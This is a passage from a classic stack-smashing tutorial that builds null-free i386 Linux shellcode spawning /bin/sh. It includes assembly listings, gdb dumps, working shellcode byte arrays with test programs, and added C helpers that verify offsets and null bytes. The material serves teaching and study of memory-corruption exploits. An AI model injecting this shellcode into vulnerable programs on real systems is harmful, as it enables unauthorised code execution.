So as we can see there is not much to the execve() system call.  All we need
to do is:

	a) Have the null terminated string "/bin/sh" somewhere in memory.
	b) Have the address of the string "/bin/sh" somewhere in memory
	   followed by a null long word.
	c) Copy 0xb into the EAX register.
	d) Copy the address of the string "/bin/sh" into the EBX register.
	e) Copy the address of the address of the string "/bin/sh" into the
	   ECX register.
	f) Copy the address of the null long word into the EDX register.
	g) Execute the int $0x80 instruction.
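As a rough sketch of steps a) through f), the C fragment below builds the same
data in an ordinary array and records which address is meant for which
register.  The struct execve_args and build_execve_args() are names made up
for this illustration; nothing in the shellcode itself uses them.

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

/* Hypothetical container for the three values that execve expects in
 * EBX, ECX and EDX on i386 Linux. */
struct execve_args {
    const char   *filename;  /* EBX: address of the string "/bin/sh"       */
    char *const  *argv;      /* ECX: address of the address of the string  */
    char *const  *envp;      /* EDX: address of the null long word         */
};

/* a) the string, b) its address followed by a null long word */
static char *name[2] = { "/bin/sh", NULL };

struct execve_args build_execve_args(void)
{
    struct execve_args a;

    a.filename = name[0];   /* the string itself                 */
    a.argv     = name;      /* the array holding its address     */
    a.envp     = &name[1];  /* the null long word after it       */
    return a;
}
```

Reusing the null long word as an empty environment is what lets the shellcode
get away with a single four-byte zero.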
But what if the execve() call
fails for some reason? The program will continue fetching instructions
from the stack, which may contain random data! The program will
most likely core dump. We want the program to exit cleanly if
the execve syscall fails. To accomplish this we must then add
an exit syscall after the execve syscall. What does the exit syscall
look like?
exit.c
------------------------------------------------------------------------------
#include <stdlib.h>

void main() {
        exit(0);
}
------------------------------------------------------------------------------
------------------------------------------------------------------------------
[aleph1]$ gcc -o exit -static exit.c
[aleph1]$ gdb exit
GDB is free software and you are welcome to distribute copies of it
 under certain conditions; type "show copying" to see the conditions.
There is absolutely no warranty for GDB; type "show warranty" for details.
GDB 4.15 (i586-unknown-linux), © 1995 Free Software Foundation, Inc...
(no debugging symbols found)...
(gdb) disassemble _exit
Dump of assembler code for function _exit:
0x800034c <_exit>:      pushl  %ebp
0x800034d <_exit+1>:    movl   %esp,%ebp
0x800034f <_exit+3>:    pushl  %ebx
0x8000350 <_exit+4>:    movl   $0x1,%eax
0x8000355 <_exit+9>:    movl   0x8(%ebp),%ebx
0x8000358 <_exit+12>:   int    $0x80
0x800035a <_exit+14>:   movl   0xfffffffc(%ebp),%ebx
0x800035d <_exit+17>:   movl   %ebp,%esp
0x800035f <_exit+19>:   popl   %ebp
0x8000360 <_exit+20>:   ret
0x8000361 <_exit+21>:   nop
0x8000362 <_exit+22>:   nop
0x8000363 <_exit+23>:   nop
End of assembler dump.
------------------------------------------------------------------------------
The exit syscall will place 0x1
in EAX, place the exit code in EBX, and execute "int 0x80".
That's it. Most applications return 0 on exit to indicate no
errors. We will place 0 in EBX. Our list of steps is now:

	a) Have the null terminated string "/bin/sh" somewhere in memory.
	b) Have the address of the string "/bin/sh" somewhere in memory
	   followed by a null long word.
	c) Copy 0xb into the EAX register.
	d) Copy the address of the string "/bin/sh" into the EBX register.
	e) Copy the address of the address of the string "/bin/sh" into the
	   ECX register.
	f) Copy the address of the null long word into the EDX register.
	g) Execute the int $0x80 instruction.
	h) Copy 0x1 into the EAX register.
	i) Copy 0x0 into the EBX register.
	j) Execute the int $0x80 instruction.

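The last three steps can be tried from C without writing any assembly.  The
sketch below assumes a Linux system with the libc syscall() wrapper;
raw_exit_status() is a hypothetical helper that forks a child, issues the raw
exit syscall there, and reports the status the parent collects.  SYS_exit is 1
on i386, matching the 0x1 above; other architectures number it differently,
which is why the symbolic constant is used.

```c
#define _GNU_SOURCE
#include <assert.h>
#include <sys/syscall.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* Run the raw exit syscall in a child process and return the exit code
 * seen by the parent, or -1 if fork/wait fails. */
int raw_exit_status(int code)
{
    int status;
    pid_t pid = fork();

    if (pid < 0)
        return -1;

    if (pid == 0) {
        /* On i386: syscall number goes in EAX, exit code in EBX, then int $0x80. */
        syscall(SYS_exit, code);
        _exit(127);             /* only reached if the raw syscall failed */
    }

    if (waitpid(pid, &status, 0) < 0 || !WIFEXITED(status))
        return -1;
    return WEXITSTATUS(status);
}
```

Calling raw_exit_status(0) mirrors what the shellcode does after a failed
execve: the process ends quietly with status 0 instead of dumping core.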
Trying to put this together in
assembly language, placing the string after the code, and remembering
we will place the address of the string, and null word after
the array, we have:
------------------------------------------------------------------------------
        movl   string_addr,string_addr_addr
        movb   $0x0,null_byte_addr
        movl   $0x0,null_addr
        movl   $0xb,%eax
        movl   string_addr,%ebx
        leal   string_addr_addr,%ecx
        leal   null_addr,%edx
        int    $0x80
        movl   $0x1, %eax
        movl   $0x0, %ebx
        int    $0x80
        /bin/sh string goes here.
------------------------------------------------------------------------------
The problem is that we don't
know where in the memory space of the program we are trying to
exploit the code (and the string that follows it) will be placed.
One way around it is to use a JMP, and a CALL instruction. The
JMP and CALL instructions can use IP relative addressing, which
means we can jump to an offset from the current IP without needing
to know the exact address of where in memory we want to jump
to. If we place a CALL instruction right before the "/bin/sh"
string, and a JMP instruction to it, the string's address will
be pushed onto the stack as the return address when CALL is executed.
All we need then is to copy the return address into a register.
The CALL instruction can simply call the start of our code above.
Assuming now that J stands for the JMP instruction, C for the
CALL instruction, and s for the string, the execution flow would
now be:

bottom of  DDDDDDDDEEEEEEEEEEEE  EEEE  FFFF  FFFF  FFFF  FFFF     top of
memory     89ABCDEF0123456789AB  CDEF  0123  4567  89AB  CDEF     memory
           buffer                sfp   ret   a     b     c

<------   [JJSSSSSSSSSSSSSSCCss][ssss][0xD8][0x01][0x02][0x03]
           ^|^             ^|            |
           |||_____________||____________| (1)
       (2)  ||_____________||
             |______________| (3)
top of                                                            bottom of
stack                                                                 stack

With these modifications, using
indexed addressing, and writing down how many bytes each instruction
takes our code looks like:
------------------------------------------------------------------------------
        jmp    offset-to-call           # 2 bytes
        popl   %esi                     # 1 byte
        movl   %esi,array-offset(%esi)  # 3 bytes
        movb   $0x0,nullbyteoffset(%esi)# 4 bytes
        movl   $0x0,null-offset(%esi)   # 7 bytes
        movl   $0xb,%eax                # 5 bytes
        movl   %esi,%ebx                # 2 bytes
        leal   array-offset(%esi),%ecx  # 3 bytes
        leal   null-offset(%esi),%edx   # 3 bytes
        int    $0x80                    # 2 bytes
        movl   $0x1, %eax               # 5 bytes
        movl   $0x0, %ebx               # 5 bytes
        int    $0x80                    # 2 bytes
        call   offset-to-popl           # 5 bytes
        /bin/sh string goes here.
------------------------------------------------------------------------------
Calculating the offsets from
jmp to call, from call to popl, from the string address to the
array, and from the string address to the null long word, we
now have:
------------------------------------------------------------------------------
        jmp    0x2a                     # 2 bytes
        popl   %esi                     # 1 byte
        movl   %esi,0x8(%esi)           # 3 bytes
        movb   $0x0,0x7(%esi)           # 4 bytes
        movl   $0x0,0xc(%esi)           # 7 bytes
        movl   $0xb,%eax                # 5 bytes
        movl   %esi,%ebx                # 2 bytes
        leal   0x8(%esi),%ecx           # 3 bytes
        leal   0xc(%esi),%edx           # 3 bytes
        int    $0x80                    # 2 bytes
        movl   $0x1, %eax               # 5 bytes
        movl   $0x0, %ebx               # 5 bytes
        int    $0x80                    # 2 bytes
        call   -0x2f                    # 5 bytes
        .string "/bin/sh"               # 8 bytes
------------------------------------------------------------------------------
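The offsets can be checked mechanically from the byte counts in the comments.
A relative JMP or CALL is measured from the end of the instruction itself, so
the jmp displacement is the total size of everything between the jmp and the
call, and the call displacement is that total plus the call's own five bytes,
negated.  The helper names and struct tail below are made up for this sketch,
and the 32-bit data layout is modelled with uint32_t so that it gives the same
answer on any host.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* 32-bit model of the data that sits right after the call instruction.
 * %esi points at str once the popl has run. */
struct tail {
    char     str[8];  /* "/bin/sh" with its terminating null at offset 7 */
    uint32_t addr;    /* address of str (the array)                      */
    uint32_t null;    /* null long word                                  */
};

/* Sum of the instruction lengths between the jmp and the call. */
int body_size(const int *len, size_t n)
{
    int total = 0;

    assert(len != NULL);
    for (size_t i = 0; i < n; i++)
        total += len[i];
    return total;
}

/* jmp skips forward over the whole body to land on the call. */
int jmp_disp(const int *len, size_t n)
{
    return body_size(len, n);
}

/* call goes back over itself and the body to land on the popl. */
int call_disp(const int *len, size_t n, int call_len)
{
    return -(body_size(len, n) + call_len);
}
```

Fed the byte counts 1, 3, 4, 7, 5, 2, 3, 3, 2, 5, 5, 2 from the listing, this
gives 0x2a for the jmp and -0x2f for the call, which are also the values that
appear in shellcodeasm.c.  The offsetof() values of addr and null in struct
tail are 0x8 and 0xc, the two displacements used with %esi.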
Looks good. To make sure it works
correctly we must compile it and run it. But there is a problem.
Our code modifies itself, but most operating systems mark code
pages read-only. To get around this restriction we must place
the code we wish to execute in the stack or data segment, and
transfer control to it. To do so we will place our code in a
global array in the data segment. We need first a hex representation
of the binary code. Let's compile it first, and then use gdb to
obtain it.
shellcodeasm.c
------------------------------------------------------------------------------
void main() {
__asm__("
        jmp    0x2a                     # 2 bytes
        popl   %esi                     # 1 byte
        movl   %esi,0x8(%esi)           # 3 bytes
        movb   $0x0,0x7(%esi)           # 4 bytes
        movl   $0x0,0xc(%esi)           # 7 bytes
        movl   $0xb,%eax                # 5 bytes
        movl   %esi,%ebx                # 2 bytes
        leal   0x8(%esi),%ecx           # 3 bytes
        leal   0xc(%esi),%edx           # 3 bytes
        int    $0x80                    # 2 bytes
        movl   $0x1, %eax               # 5 bytes
        movl   $0x0, %ebx               # 5 bytes
        int    $0x80                    # 2 bytes
        call   -0x2f                    # 5 bytes
        .string \"/bin/sh\"             # 8 bytes
");
}
------------------------------------------------------------------------------
------------------------------------------------------------------------------
[aleph1]$ gcc -o shellcodeasm -g -ggdb shellcodeasm.c
[aleph1]$ gdb shellcodeasm
GDB is free software and you are welcome to distribute copies of it
 under certain conditions; type "show copying" to see the conditions.
There is absolutely no warranty for GDB; type "show warranty" for details.
GDB 4.15 (i586-unknown-linux), © 1995 Free Software Foundation, Inc...
(gdb) disassemble main
Dump of assembler code for function main:
0x8000130 <main>:       pushl  %ebp
0x8000131 <main+1>:     movl   %esp,%ebp
0x8000133 <main+3>:     jmp    0x800015f <main+47>
0x8000135 <main+5>:     popl   %esi
0x8000136 <main+6>:     movl   %esi,0x8(%esi)
0x8000139 <main+9>:     movb   $0x0,0x7(%esi)
0x800013d <main+13>:    movl   $0x0,0xc(%esi)
0x8000144 <main+20>:    movl   $0xb,%eax
0x8000149 <main+25>:    movl   %esi,%ebx
0x800014b <main+27>:    leal   0x8(%esi),%ecx
0x800014e <main+30>:    leal   0xc(%esi),%edx
0x8000151 <main+33>:    int    $0x80
0x8000153 <main+35>:    movl   $0x1,%eax
0x8000158 <main+40>:    movl   $0x0,%ebx
0x800015d <main+45>:    int    $0x80
0x800015f <main+47>:    call   0x8000135 <main+5>
0x8000164 <main+52>:    das
0x8000165 <main+53>:    boundl 0x6e(%ecx),%ebp
0x8000168 <main+56>:    das
0x8000169 <main+57>:    jae    0x80001d3 <__new_exitfn+55>
0x800016b <main+59>:    addb   %cl,0x55c35dec(%ecx)
End of assembler dump.
(gdb) x/bx main+3
0x8000133 <main+3>:     0xeb
(gdb)
0x8000134 <main+4>:     0x2a
(gdb)
.
.
.
------------------------------------------------------------------------------
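Stepping through the bytes one at a time with x/bx works, but it is slow.  Once
the bytes are sitting in a buffer, a few lines of C can print them in the \xNN
form used for the shellcode array.  format_escaped() is a hypothetical helper
written for this illustration; it is not part of gdb or of any library.

```c
#include <assert.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Write each byte of buf into out as a four-character \xNN escape.
 * Returns 0 on success, -1 if out is too small to hold the result. */
int format_escaped(const unsigned char *buf, size_t n, char *out, size_t outsz)
{
    assert(buf != NULL && out != NULL);

    if (outsz < n * 4 + 1)
        return -1;

    for (size_t i = 0; i < n; i++)
        snprintf(out + i * 4, 5, "\\x%02x", (unsigned)buf[i]);

    out[n * 4] = '\0';
    return 0;
}
```

Given the two bytes read above, 0xeb and 0x2a, the helper produces the text
\xeb\x2a, which is how the array in testsc.c begins.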
testsc.c
------------------------------------------------------------------------------
char shellcode[] =
        "\xeb\x2a\x5e\x89\x76\x08\xc6\x46\x07\x00\xc7\x46\x0c\x00\x00\x00"
        "\x00\xb8\x0b\x00\x00\x00\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80"
        "\xb8\x01\x00\x00\x00\xbb\x00\x00\x00\x00\xcd\x80\xe8\xd1\xff\xff"
        "\xff\x2f\x62\x69\x6e\x2f\x73\x68\x00\x89\xec\x5d\xc3";

void main() {
   int *ret;

   ret = (int *)&ret + 2;
   (*ret) = (int)shellcode;

}
------------------------------------------------------------------------------
------------------------------------------------------------------------------
[aleph1]$ gcc -o testsc testsc.c
[aleph1]$ ./testsc
$ exit
[aleph1]$
------------------------------------------------------------------------------
It works! But there is an obstacle.
In most cases we'll be trying to overflow a character buffer.
As such any null bytes in our shellcode will be considered the
end of the string, and the copy will be terminated. There must
be no null bytes in the shellcode for the exploit to work. Let's
try to eliminate the bytes (and at the same time make it smaller).

           Problem instruction:                 Substitute with:
           --------------------------------------------------------
           movb   $0x0,0x7(%esi)                xorl   %eax,%eax
           movl   $0x0,0xc(%esi)                movb   %al,0x7(%esi)
                                                movl   %eax,0xc(%esi)
           --------------------------------------------------------
           movl   $0xb,%eax                     movb   $0xb,%al
           --------------------------------------------------------
           movl   $0x1, %eax                    xorl   %ebx,%ebx
           movl   $0x0, %ebx                    movl   %ebx,%eax
                                                inc    %eax
           --------------------------------------------------------

Our improved code:
shellcodeasm2.c
------------------------------------------------------------------------------
void main() {
__asm__("
        jmp    0x1f                     # 2 bytes
        popl   %esi                     # 1 byte
        movl   %esi,0x8(%esi)           # 3 bytes
        xorl   %eax,%eax                # 2 bytes
        movb   %al,0x7(%esi)            # 3 bytes
        movl   %eax,0xc(%esi)           # 3 bytes
        movb   $0xb,%al                 # 2 bytes
        movl   %esi,%ebx                # 2 bytes
        leal   0x8(%esi),%ecx           # 3 bytes
        leal   0xc(%esi),%edx           # 3 bytes
        int    $0x80                    # 2 bytes
        xorl   %ebx,%ebx                # 2 bytes
        movl   %ebx,%eax                # 2 bytes
        inc    %eax                     # 1 byte
        int    $0x80                    # 2 bytes
        call   -0x24                    # 5 bytes
        .string \"/bin/sh\"             # 8 bytes
                                        # 46 bytes total
");
}
------------------------------------------------------------------------------
And our new test program:
testsc2.c
------------------------------------------------------------------------------
char shellcode[] =
        "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
        "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
        "\x80\xe8\xdc\xff\xff\xff/bin/sh";

void main() {
   int *ret;

   ret = (int *)&ret + 2;
   (*ret) = (int)shellcode;

}
------------------------------------------------------------------------------
------------------------------------------------------------------------------
[aleph1]$ gcc -o testsc2 testsc2.c
[aleph1]$ ./testsc2
$ exit
[aleph1]$
------------------------------------------------------------------------------
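
A quick way to confirm that the rewrite removed every null byte is to scan
both arrays.  The sketch below copies the two shellcode strings from testsc.c
and testsc2.c under the made-up names old_code and new_code;
first_null_offset() is a hypothetical helper for this check.  It reports where
a string copy such as strcpy() would stop.

```c
#include <assert.h>
#include <stddef.h>

/* Bytes from testsc.c (first version, contains null bytes). */
static const unsigned char old_code[] =
    "\xeb\x2a\x5e\x89\x76\x08\xc6\x46\x07\x00\xc7\x46\x0c\x00\x00\x00"
    "\x00\xb8\x0b\x00\x00\x00\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80"
    "\xb8\x01\x00\x00\x00\xbb\x00\x00\x00\x00\xcd\x80\xe8\xd1\xff\xff"
    "\xff\x2f\x62\x69\x6e\x2f\x73\x68\x00\x89\xec\x5d\xc3";

/* Bytes from testsc2.c (rewritten version). */
static const unsigned char new_code[] =
    "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
    "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
    "\x80\xe8\xdc\xff\xff\xff/bin/sh";

/* Offset of the first 0x00 byte in code[0..len), or -1 if there is none.
 * Pass sizeof(array) - 1 so the compiler-added terminator is not counted. */
long first_null_offset(const unsigned char *code, size_t len)
{
    assert(code != NULL);

    for (size_t i = 0; i < len; i++)
        if (code[i] == 0x00)
            return (long)i;
    return -1;
}
```

For the first array the scan stops at offset 9, the immediate operand of
movb $0x0,0x7(%esi), so a string copy would deliver only nine bytes of it.
The second array has no null byte anywhere in its 45 bytes.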